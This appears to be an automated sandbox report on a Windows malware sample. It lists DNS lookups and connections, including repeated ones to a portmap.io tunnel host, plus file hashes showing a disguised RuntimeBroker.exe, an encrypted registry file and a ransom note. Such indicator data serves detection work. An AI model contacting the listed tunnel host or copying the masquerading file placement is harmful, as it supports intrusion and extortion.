US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 10.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 consent.google.com udp
GB 142.250.187.238:443 consent.google.com tcp
US 8.8.8.8:53 www.easeus.com udp
US 104.18.7.90:443 www.easeus.com tcp
US 104.18.7.90:443 www.easeus.com tcp
US 8.8.8.8:53 90.7.18.104.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 216.58.204.74:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 scripts.prdredir.com udp
US 8.8.8.8:53 widget.trustpilot.com udp
GB 89.187.167.4:443 cdn.consentmanager.net tcp
US 8.8.8.8:53 bat.bing.com udp
US 8.8.8.8:53 mc.yandex.ru udp
US 8.8.8.8:53 connect.facebook.net udp
US 8.8.8.8:53 dynamic.criteo.com udp
US 8.8.8.8:53 cdn.livechatinc.com udp
US 104.18.31.27:443 scripts.prdredir.com tcp
RU 77.88.21.119:443 mc.yandex.ru tcp
US 204.79.197.237:443 bat.bing.com tcp
NL 23.62.61.88:443 cdn.livechatinc.com tcp
GB 54.192.137.49:443 widget.trustpilot.com tcp
NL 178.250.1.13:443 dynamic.criteo.com tcp
US 8.8.8.8:53 mail.easeus.com udp
GB 163.70.147.23:443 connect.facebook.net tcp
GB 216.58.204.74:443 content-autofill.googleapis.com udp
HK 8.218.236.152:443 mail.easeus.com tcp
GB 54.192.137.49:443 widget.trustpilot.com tcp
US 204.79.197.237:443 bat.bing.com tcp
US 8.8.8.8:53 b.delivery.consentmanager.net udp
RU 77.88.21.119:443 mc.yandex.ru tcp
NL 23.62.61.88:443 cdn.livechatinc.com tcp
DE 87.230.98.78:443 b.delivery.consentmanager.net tcp
HK 8.218.236.152:443 mail.easeus.com tcp
US 8.8.8.8:53 rtg.prdredir.com udp
US 104.18.7.90:443 www.easeus.com tcp
US 8.8.8.8:53 api.livechatinc.com udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 104.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 4.167.187.89.in-addr.arpa udp
US 8.8.8.8:53 27.31.18.104.in-addr.arpa udp
US 8.8.8.8:53 13.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 23.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 49.137.192.54.in-addr.arpa udp
US 8.8.8.8:53 88.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 119.21.88.77.in-addr.arpa udp
US 8.8.8.8:53 78.98.230.87.in-addr.arpa udp
US 8.8.8.8:53 152.236.218.8.in-addr.arpa udp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 secure.livechatinc.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 226.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 accounts.livechatinc.com udp
NL 23.62.61.88:443 accounts.livechatinc.com tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
DE 193.161.193.99:39917 sebeee-39917.portmap.io tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 216.239.32.116:443 beacons4.gvt2.com tcp
US 216.239.32.116:443 beacons4.gvt2.com udp
US 8.8.8.8:53 35.215.58.216.in-addr.arpa udp
US 8.8.8.8:53 116.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 id.google.com udp
US 142.250.113.94:443 id.google.com tcp
US 8.8.8.8:53 226.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 94.113.250.142.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
DE 193.161.193.99:39917 sebeee-39917.portmap.io tcp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 youareanidiot.cc udp
US 172.67.143.125:443 youareanidiot.cc tcp
US 172.67.143.125:443 youareanidiot.cc tcp
US 8.8.8.8:53 125.143.67.172.in-addr.arpa udp
US 172.67.143.125:443 youareanidiot.cc udp
GB 142.250.187.196:443 www.google.com udp
DE 193.161.193.99:39917 sebeee-39917.portmap.io tcp
DE 193.161.193.99:39917 sebeee-39917.portmap.io tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 92.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 id.google.com udp
GB 142.250.200.3:443 id.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.187.246:443 i.ytimg.com tcp
GB 142.250.187.246:443 i.ytimg.com tcp
GB 142.250.187.246:443 i.ytimg.com tcp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.187.206:443 www.youtube.com tcp
US 8.8.8.8:53 2.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 246.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
GB 142.250.187.246:443 i.ytimg.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 142.250.200.2:443 googleads.g.doubleclick.net tcp
GB 216.58.213.6:443 static.doubleclick.net tcp
GB 142.250.200.10:443 jnn-pa.googleapis.com tcp
GB 142.250.200.2:443 googleads.g.doubleclick.net udp
GB 142.250.200.10:443 jnn-pa.googleapis.com udp
GB 142.250.179.238:443 www.youtube.com udp
GB 142.250.179.238:443 www.youtube.com tcp
US 8.8.8.8:53 2.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 6.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 10.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.109.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 collector.github.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
US 140.82.113.22:443 collector.github.com tcp
US 140.82.113.22:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 154.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
DE 193.161.193.99:39917 sebeee-39917.portmap.io tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
DE 193.161.193.99:39917 sebeee-39917.portmap.io tcp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp

Files

memory/1424-0-0x00007FFD0C7D3000-0x00007FFD0C7D5000-memory.dmp

memory/1424-1-0x0000000000910000-0x0000000000926000-memory.dmp

memory/1424-2-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp

memory/3568-5-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ir2r3plv.cmk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3568-10-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp

memory/3568-11-0x000001753AFD0000-0x000001753AFF2000-memory.dmp

memory/3568-15-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp

memory/3568-18-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/2948-31-0x000001A126A80000-0x000001A126C9C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8cb3e9459807e35f02130fad3f9860d
SHA1 5af7f32cb8a30e850892b15e9164030a041f4bd6
SHA256 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

memory/1016-43-0x000001E99BBC0000-0x000001E99BDDC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 73af4f2170e957d2e0a17b3969478aae
SHA1 0cf6ed9f94648debd2f23f4b4563a07a4d8ab8b5
SHA256 b157a020262f6ab70c58265ad703ab2ed3db6baff07a471519c8d3b682c5f329
SHA512 56d2da128397e463ed742cfc06f0e8e20bd87d439b3e164dde82da163195ac55e3fa532a427de5f3546878e2bb5532f588ea84790ca3a0e3c5cf6b242ea8572d

memory/1424-59-0x00007FFD0C7D3000-0x00007FFD0C7D5000-memory.dmp

memory/1424-60-0x0000000002B40000-0x0000000002B4C000-memory.dmp

memory/1424-61-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp

memory/1424-62-0x00000000010E0000-0x00000000010EC000-memory.dmp

C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

MD5 60b0b3fb0bf6d1307788e8c21367bead
SHA1 16a378296d1d17a399d6e7b2c470308493c1dcff
SHA256 4cd1a509102de46e0145321b036338d21463d84d8d4a56e4ab92debfe5e13cda
SHA512 3636a6f19ba0a65fdd4f9fb4526351248e77a59b7c6a4d5518497139b5a8ef97bfcd45eddaeca63aca13e0b957ffd016786bec45189b1da0a3ab186fa4e7ce1a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56067634f68231081c4bd5bdbfcc202f
SHA1 5582776da6ffc75bb0973840fc3d15598bc09eb1
SHA256 8c08b0cbceb301c8f960aa674c6e7f6dbf40b4a1c2684e6fb0456ec5ff0e56b4
SHA512 c4657393e0b9ec682570d7e251644a858d33e056ccd0f3eebffd0fde25244b3a699b8d9244bcdac00d6f74b49833629b270e099c2b557f729a9066922583f784

\??\pipe\LOCAL\crashpad_3852_EMFKEOQWSZHGPADJ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 81e892ca5c5683efdf9135fe0f2adb15
SHA1 39159b30226d98a465ece1da28dc87088b20ecad
SHA256 830f394548cff6eed3608476190a7ee7d65fe651adc638c5b27ce58639a91e17
SHA512 c943f4cfe8615ac159cfac13c10b67e6c0c9093851dd3ac6dda3b82e195d3554e3c37962010a2d0ae5074828d376402624f0dda5499c9997e962e4cfd26444c0

C:\Users\Admin\Desktop\How To Decrypt My Files.html

MD5 d2dbbc3383add4cbd9ba8e1e35872552
SHA1 020abbc821b2fe22c4b2a89d413d382e48770b6f
SHA256 5ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be
SHA512 bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fb63d3dc90ef9a384a5423b4ba9df29b
SHA1 375e0dbf33be028fe6720b40c83139936a6efa3c
SHA256 47dc7f0facf59e39c8776e1fa72404b3a3a11f4b799f0dbb913c4c68a99930d3
SHA512 b06fd4d1f4b1ef79c0cd169487859365d9754beddb57da8a27dc53224f81fdbea90a0b545f0dc5e177d95d2a3c443592543dc7eec878de4b57decf305512b047

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b25d70cf6e4d5b819f4800ce2b83ac31
SHA1 2b1e175a1e2fc3318066762ceb6b88ea6567ba58
SHA256 d593334c586a90bc87c8a90cbffde2f0460b30fb846c3ee1b61d75384c68478b
SHA512 88aac889e5abb221f0ddeff50b401a5c9142ed7f80b6ff07c6b850fa2978137d1b3e2662fe3cd0e5d9c4a2bb22b4246e4683f89af17d575b0e939895a517cf44

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 232e4bddd48134f942e5c9fc93f9d02f
SHA1 f20508365b1a9d8951a7b38e74845e14a93b7158
SHA256 e94f7870f9444fdd89c4382cfc04b7145d40ac62658be398c676f25ecd4c7187
SHA512 5e509197e701031f628f8d8689e1da3c7493e23dd3608e0c921ad179d9c99489291a4ac44125447a4411b3d8aae223afc7ef76f4bf7e462190835fbf60f16291

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ae5a1726a6629fc05dd488bff597bd52
SHA1 934c14219f584ea73a72cd3ced32dcb3a18b2d11
SHA256 69abd0691b1c0939cd1029a00e84e08e0e4789110268e1aab359d2be1ed22407
SHA512 0b39888197dc7d911728ba0da0bc199a00393c4f2c58ac77c8fc1878bc85ba8de4683f397a7f73f2f4e2d592c4c7680ba64576ed4b903f1a33f53ae2f6e5a1bc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 07055d6ef1dc9f09d4f2f95a9fd6a068
SHA1 fc3bea74ade9cba6b9afca0c591b10f2e206170b
SHA256 c166e509a52e4a4cf0d850ab23d1cb2d7ad904938dfc361a01613dc2f17cdab1
SHA512 d0b9d37f1ca41660d958f06402b8c1f392e65dcfd29756048d7b1e0c07cc5b71e1f96770783ae3b538534a4acb1a47d2db72e87d3c7dfbdc1b256246fd4be717

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

MD5 3e4d628210b6f2c3a96092203ea5c2eb
SHA1 6fd276cca9cb5e1e9c19a0b2f6026515ec6f1b0e
SHA256 5175b805ea8db533ac0b0153899804be3dd8b5151185ef5ef4614ce01f8acbba
SHA512 626ac7fe79f1b0dc5e8295831ad068cdef9d763ed2aeddaeb38d1de9701c0b4b04931dc2c98d4eeef89246c61dc06d8a3d81248f3eeddfdf8d9ce0db70e72b66

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e30e02c31ecfc1a334c8378ebe80c87f
SHA1 f32eb0e3bd4a1bac87f58a01a722be1ef779264d
SHA256 01834dc96fe96d8ad9e55347282f0cfce0a02d93edb6bcc4bee7b43e16f5febf
SHA512 1b0601d5774670d1a04f454c572bb917bf26cd52894d62112018dcb3275eca370f7743a697cf945452d4975e653040fafa3e5c59bca11bb0b45ebb3de3a7d76f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

MD5 473c0c852edc11059de9af1946acc12a
SHA1 b307a52480d05fbb3e3025b125e7923288dd2cfd
SHA256 95d3c22f39f6ec6db8a4f4659513a93827d07b8affc13dcb3330694be7385d4f
SHA512 5069edd26ff643b1668daed759c0a1b10e411f272a959b873a7f2a3c179099235213b477ff6d616df3c0159d1067fa25bcb6b480f1f85ae1fc364c3da63873bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13363462789086969

MD5 fab414ecc6ba33cb4c7bd4eb8907473a
SHA1 4e79b09e48f159afd8bc9a942bfa6b92474d5d8c
SHA256 e6242b964e47c017ca684366a8c390719f439deb7c70bcd759cb36dbe7dcd27c
SHA512 41a351a37532924b16360acf8cbd63a36c47cb9b9c5e4ea872b384c529228fdeeaf1e792b27432d6a9a196fc0911e51a33664f6b24b4b7ea8c4dcb156262a809

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

MD5 ac81c0b595b32b20317761f5b01f9ebb
SHA1 1c04855d66867ed7ae340a869cfd3bbf5cb5cf93
SHA256 aca519ec9f8f985a595533b4905dbd6ca0b95265f89c879fe3e73881082051e6
SHA512 7431e0a408762a59be45f80bf363354e0155c737331eb2c205b57a6ae9a5e4c2f8b7ab43e528acfa58c6ba6e25c58b7266cd468889730902eb91d8a80703b65e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

MD5 b5bf88a08136648cb2192b8d4ae19efd
SHA1 99ddd4bb1596e288669d17f6e8c7bf0bbfe63b32
SHA256 5c24fc66e83f2e099d42c64272ab18066643dc58261a6a2af246f72326117c21
SHA512 bdf33301475c799fd4542ec68cb2f3e6b1b38e92664d5887b46c2a07332d89a1621bfdb783056fd4b45327efcc99cc1a9b447380092dc085d9cfb91783bd88a2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

MD5 7831838767df1c630a425b50cc881f91
SHA1 ca126edc22ddfd4610c6aa5655f76b112ebbaa43
SHA256 48365632fd12690fc1dcc82dfe5e8cfdba4820b07cad5b7cd4b28a1c68948699
SHA512 4b1eb6e05fb3e32b7472c3a7da22240d8dde42d13966256ecfd94166cdb49d58e4f59d2523906f92cdb52e315f8c286a7472121544b2e2fc74585f2be7b6b2c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

MD5 49ea266bb316c19d3ca4956ddfe24073
SHA1 274c43d1e923efd70e944c6cfff06788b4112e39
SHA256 e34a88e504ed2c4e3d1d66a644c2688376e7b1db7cad950b545baa1078320b6f
SHA512 f2386035cb1051990a0a83f346b2755dae9c2d7ee23eb4816340d570aac9d0e0e00a59d1eb30a613c496e2a7a92319c99ec3499739888f7a69dcfbbcc851399f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

MD5 9126a1bb7f31bfc893a7a4ea5f3fe022
SHA1 f732767828dec391b118590bf0efeaad2e54d714
SHA256 39b32da6267fd1191e84db7ce4fafcf165eca10590994b6fbeb9ec77790b2794
SHA512 cd9cb8476ac03e11602830a4fc39099253ddcc2f03c6cf3e62980d2d6a1c43ed1a372972cf7f04c31e4f64132374e7b001a545cd477297e1cbfe55078ae161be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4e885293ceff902d3c6d67213bf1a611
SHA1 adfa42262463cb0df7dcf32bc6ba84dacabf4c5a
SHA256 ff451b10c7d775b2fa67d095512fdf4094673987594156ece234fb2269cc7340
SHA512 c00686a267c6e55db30177382657fc7e075827a7f004d41ab5a969cf9bef92ebca57dc3039d56f192a6a13500a99bcf835e46d2228a0b50363e662c24f1c8e2c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

MD5 9dcab5c90c59e6f3e47945c0f04dd1c3
SHA1 1f175e33d8ecccede6c42177d8463832b1a964e6
SHA256 868ef629a38f608b708fdeed1de4b4573d66ea1085b5751543d5c821f59d5427
SHA512 53ed04cc27122e40bc10214f6008340c24daebbf3cc5ef9e84a6076dff678a156c49d764063ec18d34fc01397a1f6aa64c7364279b66289aaa4f9c91289eb235

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

MD5 fa1af62bdaf3c63591454d2631d5dd6d
SHA1 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466
SHA256 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d
SHA512 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

MD5 981866cbe70c8ff0792adc4df11edde4
SHA1 209ec8e956c0f4cba92ae5d543d770e8f78b8eba
SHA256 ba51405c8aa2014ba6cbd221a8dca8cc85ca9f53a84651277ffdf51397534d2f
SHA512 ef0fe9edb7f8f0c1a1a187f494d552e9686e14cfac2efa07acec2e5cfac284d645d541600a5376e0bd476c15806b8a59b71498096c76d083a73a2206fc145990

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

MD5 f5474aefb0fb03898b3a22be6b97694c
SHA1 d7c83eb1008bdd193ee99a67fcff2b4bda8de5f0
SHA256 0853f9afdeca3244ff4e3b22746a18d7b82073e14534738e2a73a010dbd799a2
SHA512 e6294751a785fe51aecaba04aa9128301599016502b95f1333674fbc983b123fa8ddacb654b49e9697f963b0855e58c63c25e39b0d87e538a9624f3accbfa163

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

MD5 d37b34dcf938fd6682ea98ce1cd9bcb7
SHA1 2cf0fe2c84dbe6d6996e122ddb1c8f4586063060
SHA256 6d3a7ee079229d1312930c603e648a303c9dc8a4f001065f6cfda49af7fec2b6
SHA512 3d441383f79fa4a28ded31a247124969880a1ac20a54ec69a2ec5c79d46c503cae3f6e5ca3f12e17f67c837b7caf54a3d36451b66da408173f8adea690688f00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 13fca2a6471636089c531b174b3d59f2
SHA1 df3dc472a865bb53274b07c75319c84de071da60
SHA256 5c2777dca1c9fd2b25293b2ed57f55bee05f86763899f71dab4e591fa024ee4d
SHA512 bb484e1d03bb0b7f7919ce567573bbe0a6c35c829ed0a097993ff19d4ea07c3aabc734a06ed430537faf0c969b7aff6eb806e27bbaceedff018fce63860ca87c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

MD5 7477b2094cdf5e21a91038a2e8c45422
SHA1 0007cf3e5440dd7fcf82b4bf8f934698897169dc
SHA256 17e1537678be7b3d3afba4308f601c936740f93e37ffc537c62ab464cec6c340
SHA512 1f52a09898e3d858e8373b744b6792674f8b37a98f61cf19e00c4d887ac638d6f6af9615e11f6e1da28f7764338719d03fc2dc227139583be809cda6f3607589

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

MD5 0eb80309c20b97910fd8a4e54822f1e5
SHA1 12f1f4a440a7f6b78df1e5fb6db3b7904df02662
SHA256 cd2622c808b470e1c49605b2a274c0393ac6c7b77986bd7deddbcf3277a03e37
SHA512 6ea57e260e6eef36b56cfb51acd004d240d27895ddfd550bc88d22e6c981a32060f2e51842a580e90e7e8b3cb05aa02018033b30fd9f4a526543921431e24308

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

MD5 324d9517a7c8bc0cf2d12326801036ef
SHA1 9a59a5874a1623ad301608dfd4e9d504c13ebc38
SHA256 600b81abc132b1662662aa22101c6e9bb79235aaf4c80598a9076be4d8aaeae2
SHA512 a30df5a83ba4fb4c70e214d9bbe6be4da8e6152b114801cd8a25679a1123c72e3e8ea7a4ca7e8855bf4a3b292c9812dbc58bdf6986c1624db3c4c03f7466a790

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

MD5 20eadf8bf419c5160e2da0bdc7674455
SHA1 cd3bc6915e5acca439fb1e7bcc4056ecac22aadc
SHA256 b7d7cc80604aa74c6a2703cb0abae1959f9eaa6ff6bb9e04ccad88c9d994debd
SHA512 f9fc92c599e6c0c11886d82ad3ac24224cdc7f086b90d9327ce53b91a17a25eb17f28e4807c415d6aacbb1d5e1d12bf07cef541d89b8bc581f50195473ea3eb8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

MD5 b864a640766773252143e815ad613bc8
SHA1 3a2e3059c5715317115a22ddcaae3df3dc27b32c
